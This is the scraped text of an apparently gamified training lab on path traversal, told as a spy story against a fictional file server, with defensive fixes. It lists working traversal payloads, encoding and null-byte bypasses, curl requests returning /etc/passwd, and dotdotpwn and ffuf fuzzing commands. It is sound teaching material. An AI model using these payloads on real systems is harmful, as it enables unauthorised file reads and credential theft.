«
‹
HACKAACADEMY
OP-07 // OPERATION DARK CORRIDOR // PATH TRAVERSAL
0
XP
R1
RANK
0%
DETECT
↻
RESET
CAMPAIGN 3 — OPERATION DARK CORRIDOR
PATH TRAVERSAL // TARGET: NEXUS FILE SERVER
07
OWASP TOP 10 #1 — A01:2021
PATH TRAVERSAL
DIRECTORY ESCAPE // FILE DISCLOSURE // CREDENTIAL THEFT
OPERATION DARK CORRIDOR
📡
SITUATION REPORT
CLASSIFIEDPost-Shell Storm, the Syndicate has gone dark — but MENDAX caught traffic bleeding out of Node Beta: a PHP file server in a Reykjavik data-haven. It hands documents to authenticated Syndicate operatives through a simple API:
The Architect is back. He survived Berlin in Op 01, and Director Kane put him in charge of hardening Syndicate infrastructure ever since. He believes the web root is an impenetrable boundary.
He is wrong. The path parameter passes directly to PHP's
/api/files/download?path=reports/q3.pdf.The Architect is back. He survived Berlin in Op 01, and Director Kane put him in charge of hardening Syndicate infrastructure ever since. He believes the web root is an impenetrable boundary.
He is wrong. The path parameter passes directly to PHP's
fopen() — no canonicalisation, no directory restriction. Type ../ and you climb one directory above the web root. Keep climbing and you reach the entire server filesystem. SSH credentials. Encryption keys. Everything.THE HOTEL WITH UNLOCKED STAFF CORRIDORS
10-YEAR-OLD LEVEL
Imagine a hotel where each guest is assigned a specific room. Guests are expected to stay only within their assigned space. But the building has internal pathways that were never properly restricted.
Now imagine a guest moves beyond their assigned room and follows hidden paths into restricted areas meant only for staff. Rooms that contain sensitive information become accessible simply by moving through these hidden routes. Because the system assumes guests will never try to leave their assigned space.
Now imagine a guest moves beyond their assigned room and follows hidden paths into restricted areas meant only for staff. Rooms that contain sensitive information become accessible simply by moving through these hidden routes. Because the system assumes guests will never try to leave their assigned space.
If
../ means go up one directory — and the server does not restrict how many times you can use it — what is the only thing stopping you from reaching any file on the entire server?INTERCEPTED — The Architect COMMS
07:51 UTC
ARCHITECT DEV
"The file API is clean. I confirmed path validation was added at the application layer. No shell access, no command vectors. Node Beta is hardened. Shadow cannot touch it."
ARCHITECT DEV
"We validate that all paths start with briefs/ before serving. Nothing outside briefs/ is accessible. I checked it myself."
CIPHER
He is checking the prefix before stripping traversal sequences. That order is backwards. The check must happen after canonicalisation. Fix it now or shut the API down.
ARCHITECT DEV
"Does the order actually matter? The prefix check still catches anything not starting with briefs/."
▶ MISSION OBJECTIVES
01
TARGET: The NEXUS file server — a download endpoint that joins your raw filename onto
/var/www/html/reports/ with no path validation02
EXPLOIT: Chain
../ sequences to climb out of the web root, reach /etc/passwd, and extract the SSH credentials03
SWEEP: Classify NEXUS file paths — flag which are traversal-vulnerable and which are safely restricted to their directory
04
WIN: Capture the credential file, then lock it down — canonicalise the path and enforce a directory allowlist
⚖️
ETHICAL NOTICE: Path traversal is covered by CEH, OSCP, and every cybersecurity certification. All interactions here are simulated against fictional infrastructure. Never use these techniques on real systems without explicit written authorisation.
🔧 UNDER THE HOOD▼
THE ATTACK — STEP BY STEP
Path traversal — use
../ sequences to escape the intended directory and read arbitrary files:// App serves files from /var/www/uploads/
GET /api/file?name=report.pdf // intended
GET /api/file?name=../../../../etc/passwd // traversal
// On Windows:
GET /api/file?name=..\..\..\..\windows\win.ini
Encoded variants to bypass naive filters:%2e%2e%2f (URL encoded ../)
%2e%2e/ (partially encoded)
..%2f (slash encoded)
%2e%2e%5c (Windows backslash)
....// (double-dot to survive single-replace filters)
IDOR on restricted records — change a document ID in the URL to access records belonging to other users without any traversal needed:GET /api/records/10042 // yours
GET /api/records/10041 // someone else's
COMMON VARIATIONS
1. Null byte injection — in older PHP/C apps, a null byte terminates the string before the extension check:
GET /api/file?name=../../../../etc/passwd%00.pdf
// Extension check sees ".pdf", file system reads up to the null byte
2. Archive traversal (Zip Slip) — a malicious zip file contains entries with path traversal names:// Entry in zip: ../../bin/evil.sh
// When extracted, overwrites a system binary
3. Double URL encoding — the server decodes once (failing the filter), then the framework decodes again:%252e%252e%252f (double-encoded ../)
HOW TO DEFEND
Resolve to canonical path and verify it stays inside the allowed root — do this AFTER all decoding:
// Node.js
const path = require('path');
const BASE = '/var/www/uploads';
function safeRead(filename) {
const resolved = path.resolve(BASE, filename);
if (!resolved.startsWith(BASE + path.sep)) {
throw new Error('Path traversal detected');
}
return fs.readFileSync(resolved);
}
// Python
import os
BASE = '/var/www/uploads'
resolved = os.path.realpath(os.path.join(BASE, filename))
if not resolved.startswith(BASE + os.sep):
raise ValueError('Path traversal detected')
Never pass user-controlled filenames directly to file system calls. Use UUID-based filenames stored in a database, mapping internal IDs to physical files.TARGET
nexus-files.ghost-capital.int
IP ADDRESS
10.47.0.77
OS / WEB SERVER
Ubuntu 22.04 · nginx/1.18.0
KEY SERVICES
PHP/7.4.28 · /files/download?name=
ATTACK SCOPE
Filesystem read via traversal — /etc/passwd in scope
ATTACKER NODE
shadow@sigma9 · 10.99.0.1
📋 ROOM TASKS
01
✓
Understand how ../ sequences escape the web root
02
▶
Traverse the directory tree to read /etc/passwd
03
○
Classify vulnerable vs safe path handling
04
○
Identify the realpath() validation fix
05
○
Submit the capture-the-flag token
CAPTURE THE FLAG
Complete the exploit lab. The flag appears in the terminal output. Copy and submit it here for +50 XP.
PHASE 01
ESCAPE THE WEB ROOT
EXPLOIT
MENDAX
ENCRYPTED
You slipped
The server only ever meant to serve from one place:
Ask for
You just stepped outside the web root. Now make the call: which payload climbs from
../ into the NEXUS file request — and the download that was meant to stay inside the reports folder walked straight out of the web root and handed you a file from elsewhere on the server.The server only ever meant to serve from one place:
/var/www/html/reports/[your input]Ask for
q3.pdf and you get the report. But ../ means go up one directory — ../secret.txt climbs one level above reports, and chaining more ../ sequences walks all the way to any file on the box.You just stepped outside the web root. Now make the call: which payload climbs from
/var/www/html/reports/ all the way to /etc/passwd?SIGMA-9 CAPTURE LOG — HOW WE FOUND IT
03:14 UTC
> target: simulated NEXUS file-server (lab range only)
> fuzzing the document parameter for path handling...
> 200 OK /download?file=q3.pdf — normal
> 200 OK /download?file=../q3.pdf — server resolved ../ instead of blocking it
MENDAX: "Shadow — it followed the
../. The file path isn't sanitised. The Architect's wall has a staircase behind it. Watch how I confirm it."MENDAX — HOW THIS IS ACTUALLY DONE
LIVE
MENDAX
Here's the real mechanic, so you understand exactly what's happening. The endpoint drops your input straight into a file path. I just feed it
../ sequences with curl — each one climbs one directory:$ curl "https://files.nexus.lab/download?file=../../../../etc/passwd"
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
MENDAX
Filters that block the literal
../ still fall to URL-encoding — %2e%2e%2f is the same thing dressed up. That's why blocklists never hold:$ curl "https://files.nexus.lab/download?file=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd"
# same file comes back — the encoding slipped past the filter
MENDAX
The fix is one line: resolve the path and confirm it still lives under the allowed folder before opening it — we'll cover that on the way out. For now, you make the call. How many
../ to escape /var/www/html/reports/?▶ PICK THE TRAVERSAL PAYLOAD
💡 MENDAX — HINT (−20 XP)
Count the directory levels from the starting point to the root: reports/ is inside html/ which is inside www/ which is inside var/ which is inside /. That is four levels deep. Each
../ climbs one level. How many do you need to reach the root — and then add /etc/passwd after?✓
PATH TRAVERSAL CONFIRMED — WEB ROOT ESCAPED
The server resolved our path:
In simple terms: We found the unlocked staircase. Four flights down from our room, past the lobby, into the basement — and the master keys were sitting right there. The Architect built a wall at the front door. He forgot the staircase entirely.
The
/var/www/html/reports/../../../../etc/passwd — four levels up to the root, then down into /etc/. PHP's fopen() followed the path without question and returned the file.In simple terms: We found the unlocked staircase. Four flights down from our room, past the lobby, into the basement — and the master keys were sitting right there. The Architect built a wall at the front door. He forgot the staircase entirely.
The
/etc/passwd file contains usernames and home directories for every account on the server. Combined with /etc/shadow for hashed passwords — we can crack credentials offline and own every NEXUS server using the same credentials.
Real-world impact: CVE-2021-41773 — Apache HTTP Server path traversal. An attacker could map URLs outside the document root. Exploited in the wild within hours of disclosure. 112,000 servers exposed. CVSS 7.5.
PHASE 02
DIRECTORY TREE NAVIGATOR — CLIMB TO /etc/passwd
NAVIGATE
The entry point is confirmed. Now use it — navigate the live filesystem one directory at a time until you reach the credentials the Architect has been hiding.
MENDAX
ENCRYPTED
We are inside the NEXUS file server. We start at
Think of the hotel staircase. You are on floor 3. Each
Tap each directory level to climb up — or tap a folder name to enter it. Your goal is to reach
/var/www/html/reports/ — the web root. Below the directory tree, you can see the server's filesystem structure.Think of the hotel staircase. You are on floor 3. Each
../ takes you one floor down. Keep going until you reach the basement — then navigate to the master keys.Tap each directory level to climb up — or tap a folder name to enter it. Your goal is to reach
/etc/passwd.MISSION OBJECTIVENavigate from the web root at
/var/www/html/reports/ to /etc/passwd using ../ directory traversal. Each tap climbs one level. Reach the target file to extract the server's user credentials.▶ TAP [../] TO CLIMB UP — TAP A FOLDER TO ENTER IT
PAYLOAD BEING BUILT
Request: reports/
Resolves to: /var/www/html/reports/
LEAVE MISSION?
Progress is saved. You can resume from the mission select screen at any time.
RESET MISSION?
This wipes all progress for this operation only. XP in other operations is unaffected.
ARE YOU SURE?
Final confirmation -- all progress for this operation will be permanently erased.
💡 MENDAX — ACTIVE HINT
Tap the ../ (go up one level) button repeatedly to climb above the web root. Keep going until you reach the root directory
/ — then tap into etc/ and look for the passwd file. Each ../ is one staircase flight up.✓
/etc/passwd EXTRACTED — NEXUS CREDENTIALS IN HAND
Four
Simple version: We took the unlocked staircase — four flights down — walked through the basement, and the master keys were sitting on the table. The boundary The Architect believed in existed only in his mind. It was never enforced in the code.
Why this matters beyond one file: With usernames from
../ sequences escaped the web root. The server resolved the path to /etc/passwd and returned every user account on the machine — usernames, home directories, shell assignments. The Architect's credentials are among them.Simple version: We took the unlocked staircase — four flights down — walked through the basement, and the master keys were sitting on the table. The boundary The Architect believed in existed only in his mind. It was never enforced in the code.
Why this matters beyond one file: With usernames from
/etc/passwd and hashes from /etc/shadow (if readable), an attacker can perform offline password cracking and gain SSH access — complete server control.
Real impact: CVE-2021-41773 — Apache HTTP Server path traversal, exploited within hours of disclosure. 112,000 servers exposed. Attackers read sensitive config files and SSH keys.
PHASE 03
CLASSIFY THE PATHS — TRAVERSAL RISK OR SAFELY RESTRICTED?
TAP & SORT
The traversal is done. Now map the wider attack surface — not every URL parameter points to a protected file. The intel value depends on knowing which paths are actually exploitable.
MENDAX
ENCRYPTED
SCRIBE is reviewing file and document endpoints across NEXUS platforms — trying to identify which ones can escape their allowed directory and which ones are safely restricted.
MENDAX: "Shadow — classify each parameter. Tap it, then mark it TRAVERSAL RISK if the user can influence a filesystem path, or SAFE if the server uses a fixed lookup, allowlist, or canonical path boundary."
The test: can attacker-controlled input become a path that the server opens? If yes, and there is no canonical directory check, it is a traversal risk.
Get them all right to proceed.
MENDAX: "Shadow — classify each parameter. Tap it, then mark it TRAVERSAL RISK if the user can influence a filesystem path, or SAFE if the server uses a fixed lookup, allowlist, or canonical path boundary."
The test: can attacker-controlled input become a path that the server opens? If yes, and there is no canonical directory check, it is a traversal risk.
Get them all right to proceed.
▶ TAP AN INPUT — THEN TAP A BUCKET
Tap an input chip to select it, then tap SAFE or DANGEROUS to classify it.
⚠ TRAVERSAL RISK
✓ SAFE
✓
ALL PATHS CLASSIFIED — TRAVERSAL SURFACE MAPPED
Perfect classification. You can now identify path traversal vulnerabilities on sight.
Simple rule: Any endpoint where user input becomes part of a file path — without canonicalisation and directory restriction — is a traversal risk. Hardcoded paths, ID-based lookups, and allowlist-enforced filenames are safe because the user cannot inject
Simple rule: Any endpoint where user input becomes part of a file path — without canonicalisation and directory restriction — is a traversal risk. Hardcoded paths, ID-based lookups, and allowlist-enforced filenames are safe because the user cannot inject
../ sequences that the server will follow.
Why canonicalisation matters:
realpath() in PHP or Python resolves the absolute path after all ../ sequences are resolved. The server then checks: does this resolved path start with the allowed directory? If not — 403. One function call. Zero traversal.PHASE 04
THE FIX — CLOSE THE DOOR
DEFENSE
The files are extracted. One question remains: what single line of server-side code would have stopped the entire operation? Lock it down before the Architect adapts.
MENDAX — DEBRIEF
FINAL PHASE
GHOST is being brought in. USD 50,000 recovered.
MENDAX: "Shadow — debrief question. NEXUS's development team is patching the portal right now. Which single fix would have stopped the entire attack? The browser behaviour cannot be changed — we can't stop cookies from being sent automatically. The fix has to be on the server side."
MENDAX: "Shadow — debrief question. NEXUS's development team is patching the portal right now. Which single fix would have stopped the entire attack? The browser behaviour cannot be changed — we can't stop cookies from being sent automatically. The fix has to be on the server side."
▶ WHICH FIX STOPS PATH TRAVERSAL?
💡 MENDAX — HINT (−20 XP)
Think about WHY the attack worked: the server used our path directly to open a file without checking where that path actually resolved to. The fix resolves the path first — then checks if the result is inside the allowed directory. Which option does that?
► INTEL — OP-07 // OPERATION DARK CORRIDOR
TARGET: NEXUS File Server — Document Repository
Classification: TOP SECRET // Campaign 3 Ghost Protocol
MENDAX — CHANNEL BRIEFING
PRE-OP
MENDAX
The file retrieval endpoint resolves paths relative to /var/www/docs/. No canonicalization. Sequences like ../../../etc/passwd navigate outside the document root.
📓
OWASP CLASSIFICATION
INTELA01:2021 — Path traversal allows an attacker to access files outside the intended directory. Combined with file inclusion, it achieves remote code execution.
⚖
GLOSSARY TERMS: Path Traversal, Directory Traversal, File Disclosure, Canonicalization, Null Byte Injection. All terms auto-logged to your Field Manual as you encounter them.
▶ ACADEMY — PATH TRAVERSAL
THE WEB ROOT IS NOT A WALL.
PATH TRAVERSAL FINDS THE UNLOCKED STAIRCASE.
PATH TRAVERSAL FINDS THE UNLOCKED STAIRCASE.
Three levels of depth — start at Beginner, go as deep as you want.
BEGINNER
What Is Path Traversal?
›
Path traversal happens when an application uses user-supplied input to construct a file path — and an attacker includes
Here is how it feels: a document server lets you download files. You request
The two things that make path traversal possible:
• User input reaches a file-opening function directly
• The path is not canonicalised and checked against an allowed base directory
../ sequences to escape the intended directory and access files the application was never meant to serve.Here is how it feels: a document server lets you download files. You request
../../../../etc/passwd. The server appends your input to the base path, resolves it, and returns the file — because it never checked whether the resolved path is inside the permitted directory.The two things that make path traversal possible:
• User input reaches a file-opening function directly
• The path is not canonicalised and checked against an allowed base directory
Real world: CVE-2021-41773 — Apache HTTP Server 2.4.49 path traversal. Exploited in the wild within hours. 112,000 servers exposed. Attackers read SSH keys, config files, and application secrets.
INTERMEDIATE
Traversal Techniques
›
Classic traversal:
URL encoding bypass:
Many filters block the literal
Double encoding bypass:
Server decodes once →
Null byte injection (older PHP):
The null byte terminates the string in C — the .pdf suffix is ignored
Windows traversal:
Also works with mixed slashes:
../../../../etc/passwd — four levels up then into /etc/URL encoding bypass:
%2e%2e%2f%2e%2e%2fetc%2fpasswd — ../.. encodedMany filters block the literal
../ but miss encoded variantsDouble encoding bypass:
%252e%252e%252f — the % is itself encoded as %25Server decodes once →
%2e%2e%2f → passes filter → decoded again → ../Null byte injection (older PHP):
../../../../etc/passwd%00.pdfThe null byte terminates the string in C — the .pdf suffix is ignored
Windows traversal:
..\..\..\Windows\System32\drivers\etc\hostsAlso works with mixed slashes:
..\../etc/passwd
EXPERT
Defences & CVEs
›
Primary defence — canonicalise then check:
realpath() resolves all ../ sequences. The prefix check catches all traversal variants.
Allowlist of permitted filenames:
Only allow filenames from a database or predefined list. If the filename is not in the list — reject. The user can never supply a path that was not pre-approved.
Serve files by ID not by name:
Notable CVEs:
• CVE-2021-41773 — Apache 2.4.49 path traversal, CVSS 7.5, exploited in hours
• CVE-2019-11510 — Pulse Secure VPN path traversal, credentials stolen at scale
• CVE-2018-13379 — Fortinet FortiOS path traversal, VPN credentials exposed
safe = os.path.realpath(base + user_input)if not safe.startswith(base): return 403realpath() resolves all ../ sequences. The prefix check catches all traversal variants.
Allowlist of permitted filenames:
Only allow filenames from a database or predefined list. If the filename is not in the list — reject. The user can never supply a path that was not pre-approved.
Serve files by ID not by name:
/download?id=42 — server looks up file path from database. User never supplies a path. No traversal possible because no path is accepted.Notable CVEs:
• CVE-2021-41773 — Apache 2.4.49 path traversal, CVSS 7.5, exploited in hours
• CVE-2019-11510 — Pulse Secure VPN path traversal, credentials stolen at scale
• CVE-2018-13379 — Fortinet FortiOS path traversal, VPN credentials exposed
Pulse Secure VPN (CVE-2019-11510): Path traversal in the VPN gateway allowed unauthenticated attackers to read arbitrary files — including session cookies and plaintext credentials. Used in attacks against defence contractors, financial institutions, and government agencies worldwide.
▶ REAL-WORLD TOOLS — PATH TRAVERSAL
WHAT PROFESSIONALS USE
Every tool here is free, legal, and used in real penetration tests.
🔫
dotdotpwn
FREE / OPEN SOURCE
Dedicated path traversal fuzzer. Automatically generates and tests hundreds of traversal payloads — including encoding variants — against HTTP, FTP, and other protocols. The standard tool for traversal testing.
dotdotpwn -m http -h target.com -U "/download?path=TRAVERSAL" -f /etc/passwd
🔎
Burp Suite — Intruder
FREE TIER
Mark the path parameter in Intruder, load a traversal payload list (SecLists/Fuzzing/LFI), fire. Burp tests all encoding variants automatically. Filter by response length to find successful reads.
Intruder → Add § around path value → SecLists LFI payloads → Attack
🐍
ffuf
FREE / OPEN SOURCE
Fast web fuzzer. Feed it a traversal wordlist and let it enumerate file paths at speed. Use the -fs flag to filter out responses of a specific size — finds valid file reads by size difference from 404s.
ffuf -u "http://target/dl?path=FUZZ" -w lfi-payloads.txt -fs 512
🌊
OWASP ZAP — Active Scan
FREE / OPEN SOURCE
ZAP's active scanner tests all parameters for path traversal automatically. Passive scan flags file download endpoints that accept user-supplied filenames without validation headers.
Active Scan → Path Traversal → View alerts